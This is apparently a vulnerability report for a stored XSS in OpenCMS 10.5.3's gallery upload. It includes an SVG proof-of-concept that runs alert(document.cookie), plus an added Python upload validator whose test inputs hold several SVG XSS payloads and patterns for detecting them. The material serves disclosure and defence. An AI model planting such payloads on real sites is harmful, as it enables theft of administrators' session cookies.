
Stored Cross Site Scripting via SVG image upload in Gallery Functionality #587

Closed
@MrR3boot

Description

Dear Team, I would like to report a persistent XSS vulnerability in the latest release. MITRE assigned a CVE ID for this.

Description:

A Cross-Site Scripting (XSS) vulnerability in the Gallery functionality of OpenCMS 10.5.3 allows remote attackers to execute arbitrary web script via a crafted SVG image.

Steps to Reproduce:

  1. Log in as a user who has the Gallery Editor role.
  2. Navigate to the gallery and upload the SVG file below.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
  3. Once another user who has Root Administrator permissions visits the image link or views the uploaded SVG image, the script gets executed.

Fix:

Input file validation

Affected Version:

10.5.3 (latest release)
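The report above suggests "input file validation" as the fix. The following is an added example (not OpenCMS code and not the reporter's) of what such a check has to look for in an uploaded SVG before it is stored and served: it parses the file as XML and flags the things a browser will execute, namely script and foreignObject elements, on* event-handler attributes, javascript:/data: URIs in href or src, and animations that rewrite href. The sample inputs are constructed here; the first one is a copy of the payload from the issue. It assumes the check runs at upload time and uses only the standard library; for untrusted XML in production, parsing with defusedxml instead of xml.etree limits entity-expansion attacks as well.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the payload from the issue above, copied here as test input.
ISSUE_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
"""

# Constructed sample: no <script> element, the script sits in an event handler instead.
EVENT_HANDLER_PAYLOAD = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <circle cx="10" cy="10" r="5"/>
</svg>
"""

# Constructed sample: a javascript: link wrapped around a shape.
JS_HREF_PAYLOAD = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="javascript:alert(document.cookie)"><rect width="50" height="50"/></a>
</svg>
"""

# Constructed sample: a benign image that should pass.
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
"""

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that execute script or embed arbitrary HTML inside an SVG document.
SCRIPT_CAPABLE_ELEMENTS = {"script", "foreignobject"}
# Attributes that carry a URI the browser will dereference.
URI_ATTRIBUTES = {"href", "src"}
DANGEROUS_SCHEMES = {"javascript", "data", "vbscript"}


def _local(name: str) -> str:
    """Lowercase local name: strips a Clark-notation {uri} namespace or an xlink: style prefix."""
    return name.rsplit("}", 1)[-1].rsplit(":", 1)[-1].lower()


def _scheme(value: str) -> str:
    """URI scheme of an attribute value; non-printable characters are dropped first,
    since browsers ignore tabs and newlines inside 'java\\nscript:'."""
    cleaned = "".join(ch for ch in value if ch.isprintable()).strip().lower()
    return cleaned.split(":", 1)[0] if ":" in cleaned else ""


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an uploaded SVG must be rejected; an empty list means no active content was found."""
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD referenced by the DOCTYPE
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append(f"root element is {root.tag!r}, not an SVG document")

    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in SCRIPT_CAPABLE_ELEMENTS:
            findings.append(f"<{tag}> element")
        # <animate>/<set> can swap a harmless href for a javascript: one after load.
        if tag in {"animate", "set"} and _local(elem.get("attributeName", "")) == "href":
            findings.append(f"<{tag}> element animating href")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"event handler attribute {name}={value!r}")
            elif name in URI_ATTRIBUTES and _scheme(value) in DANGEROUS_SCHEMES:
                findings.append(f"{name} attribute uses {_scheme(value)}: scheme")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """Upload-time gate: accept only SVGs with no findings."""
    return not svg_findings(data)


if __name__ == "__main__":
    for label, sample in [("issue payload", ISSUE_PAYLOAD), ("onload", EVENT_HANDLER_PAYLOAD),
                          ("javascript: href", JS_HREF_PAYLOAD), ("benign", BENIGN_SVG)]:
        print(f"{label}: {svg_findings(sample) or 'accepted'}")
```

A deny-list like this shows what the gallery upload must catch, but an allow-list of permitted elements and attributes is the more robust way to sanitize SVG, and serving user uploads from a separate origin or with Content-Disposition: attachment keeps any script that does slip through from running in the CMS session, which is what turns this into a cookie theft against the Root Administrator in step 3.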
